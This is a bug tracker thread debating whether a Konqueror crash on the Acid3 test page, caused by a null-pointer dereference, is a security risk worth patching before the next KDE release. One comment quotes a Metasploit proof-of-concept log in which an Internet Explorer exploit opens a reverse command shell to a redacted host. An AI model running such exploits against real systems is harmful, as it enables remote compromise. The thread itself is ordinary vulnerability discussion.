Per upstream's bug http://bugs.kde.org/155451 -- Konqueror crashes when viewing the Acid3 test page. Patch that fixes the issue is at http://websvn.kde.org/?view=rev&revision=761357 .
KDE 3.5.9 will be tagged in 4 days and released a week later. So this bug will get resolved soon but LATER. :-)
I wondering why you don't want to fix it NOW. Crash is a serious security vulnerability which might lead to remote (in this case) system compromise. The patch is really simple: http://websvn.kde.org/branches/KDE/3.5/kdelibs/khtml/ecma/kjs_traversal.cpp?r1=761357&r2=761356&pathrev=761357 IMHO it should be fixed in the current stable version unless KDE 3.5.9 will be tagged as stable in few days. Please review the issue.
(In reply to comment #2) > Crash is a serious security vulnerability which might lead to remote (in this > case) system compromise. How exactly is a null-pointer dereference a gateway to remote code execution?
I never tried it myself, but a quick search "exploitable null-pointer" shows that it's possible to control this null pointer under some conditions. For example, http://securityreason.com/securityalert/2286 Since we are not sure, why don't we just fix it?
here is even better reference: https://www.owasp.org/index.php/Null-pointer_dereference Severity Medium Likelihood of exploit Medium
Sorry for the spam, but I've found the original paper: Exploiting the Otherwise Unexploitable http://uninformed.org/?a=5&t=txt&v=4 Abstract: This paper describes a technique that can be applied in certain situations to gain arbitrary code execution through software bugs that would not otherwise be exploitable, such as NULL pointer dereferences <.. skip ..> in Internet Explorer to gain arbitrary code execution The following example shows this proof of concept in action: msf exploit(windows/browser/ie_unexpfilt_poc) > exploit [*] Started reverse handler [*] Using URL: http://x.x.x.x:8080/FnhWjeVOnU8NlbAGAEhjcjzQWh17myEK1Exg0 [*] Server started. [*] Exploit running as background job. msf exploit(windows/browser/ie_unexpfilt_poc) > [*] Sending stage (474 bytes) [*] Command shell session 1 opened (x.x.x.x:4444 -> y.y.y.y:1059) msf exploit(windows/browser/ie_unexpfilt_poc) > session -i 1 [*] Starting interaction with 1... Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\Documents and Settings\mmiller\Desktop>
(In reply to comment #6) > Exploiting the Otherwise Unexploitable > http://uninformed.org/?a=5&t=txt&v=4 ..except that null-pointer dereference doesn't generate an exception, but results in immediate termination of the process in question.
A new way of exploiting null-pointer exception has been discovered: http://www.matasano.com/log/1032/this-new-vulnerability-dowds-inhuman-flash-exploit/ http://documents.iss.net/whitepapers/IBM_X-Force_WP_final.pdf
bugzie.
No need to patch something to pass syntetic test.
(In reply to comment #10) > No need to patch something to pass syntetic test. > The summary is not accurate: konqueror crashes during the test which might lead to remote compromise. (In reply to comment #3) > How exactly is a null-pointer dereference a gateway to remote code execution? Well, one year later, here we are: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-2692 http://www.milw0rm.com/exploits/9477 It all started from adobe flash null pointer exploit btw. Do you still want to accept a risk and not to apply a trivial patch? Since then security patches marked as "wontfix" in Gentoo ???
> (In reply to comment #3) > > How exactly is a null-pointer dereference a gateway to remote code execution? > > Well, one year later, here we are: > http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-2692 > http://www.milw0rm.com/exploits/9477 > It all started from adobe flash null pointer exploit btw. Right, I stand corrected. Note that NULL pointer dereference in kernel is different than one in userspace, AFAIK. > Do you still want to accept a risk and not to apply a trivial patch? > Since then security patches marked as "wontfix" in Gentoo ??? The bug in question was reported against KDE 3.5.8. We have had 3.5.10 for ages, so the bug is fixed.
